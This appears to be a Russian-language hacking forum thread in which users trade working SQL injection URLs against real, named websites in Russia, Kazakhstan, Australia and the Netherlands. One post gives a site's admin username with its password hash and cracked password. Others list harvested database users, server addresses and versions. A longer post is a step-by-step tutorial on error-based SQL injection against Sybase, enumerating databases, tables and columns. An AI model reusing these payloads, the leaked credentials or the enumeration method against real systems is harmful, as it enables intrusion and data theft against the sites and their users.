http://www.masterphoto.ru/news/news.php?uid=-1+union+select+1,concat(user_password,char(58)),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+php bb_users%20where%20user_id=2/*

masterphoto:786c2704f76e06e44aad1e0213d26018:gbcbr henj

http://www.masterphoto.ru/forum/admin/

там еше и форум есть а я спать

Крупный хостиг в зоне кз
http://user.kz/files/cifry.php?sid=-9965481+union+select+1,2,3,4,5,6,7/*

http://handbook.ecu.edu.au/CourseStructure.asp?disyear=2008+and+1=1--&CID=1&USID=0&UCID=0&UID=0&Ver=0&HB=HB&SC=

ReVOLVeR
Хорош прикалываться
1.баян
2.вобще люкс: твой пост
_http://forum.antichat.ru/showpost.php?p=621958&postcount=5162

Хм, чето только мускул один, есть же и другие: Postgre, Mssql, Sybase и т.д. осбенно мало на форумах постят про Sybase...
вобщем Sybase использует Transact-SQL, как например MS Access и MSSQL но они отличаются немного, вот пример:
Получаем данные через вывод сообщения об ошибке приведения типов.
версия:
текущий пользователь:
имена бд:
следующее имя бд:
здесь 0x73796273797374656D6462=hex('sybsystemdb')

следующее имя:
0x726670726F64=hex('rfprod') и т.д.

узнаем таблицы в бд rfprod (в других по аналогии):
тут надо пояснить, || -знак конкатенации (объединения) в sybase, convert(char,id) нужен для того, что бы привести числовое поле id (очень нужное) к символьному типу, иначе возникнет ошибка несоответствия типов, from+rfprod..sysobjects означает то, что мы выбираем значения из системной таблицы sysobjects базы данных rfprod, в этой таблице хранятся записи об объектах этой бд, но нам нужны не все объекты, а только пользовательские таблицы, они имеют тип U, hex('U')=0x55 (where+type=0x55) надеюсь с этим все понятно

узнаем имя следующей таблицы:
поясню, т.к. id уникально, для перебора удобнее использовать именно его

узнаем поля таблицы wifi_reactions (id=1785877529) (другие таблицы по аналогии):
Тут тоже нужно пояснить: colid - это идентификационный номер поля, он не несет смысловой нагрузги, но его удобно использовать при переборе, from+rfprod..syscolumns означает то, что мы выбираем значения из системной таблицы syscolumns базы данных rfprod, в этой таблице хранятся записи об колонках этой бд! (а не только одной таблицы), where+id=1785877529 - указывает колонки какой таблицы выбирать, я ранее говорил, что id таблицы очень важное для нас значение, так вот определение того, к какой таблице принадлежит имя поля, происходит именно по id таблицы и только по id

узнаем имя следующего поля:
и т.д

получаем данные из таблицы wifi_reactions:
что это такое, фиг его знает, но нам важны не данные, а принцип получения данных, convert(varchar,reactions) - нужен для того, что бы привести данные из поля reactions, которое имеет тип VARBINARY, к типу varchar для совместимости, если этого не сделать, появится ошибка несовместимости типов

Ну вроде пока все, так вот из обычного поста получилась небольшая статейка для новичков, об SQL-inj в SYBASE Adaptive Server Enterprise

ЗЫ в ASE жесткое разграничение прав пользователей, для пользователя может быть ограничен доступ не только к БД и таблице БД, но также и к отдельному полю таблицы

__________________
Карфаген должен быть разрушен...

http://www.gallery1905.ru/news/more.php?id=-42+union+select+1,version(),3,4,5,6,7,8/*

http://www.videoland.nl/index_film_record.php?id=4370455454+union+select+0 ,1,2+from+a

таблицы

http://www.seatsandsofas.nl/info.php?id=7&lang_id=1&country_id=1444'union+sele ct+0,1,2,3,4+from+users/*
+таблицa: admin

Сервс провайдер на рынке SMS
+ моя первая скуля.
user: sms@212.111.95.84
Log: Debian_7etch4-log
version: 5.0.32

__________________

• Ukrainian Security Community – Блог спеціалістів з безпеки веб-додатків
• Security Audit

MoDL

csuser@localhost.localdomain
citysite
4.0.16

webmonger.net
VERSION: 4.1.22-standard
USER: webmonge@localhost
DATABASE: webmonge_webmonger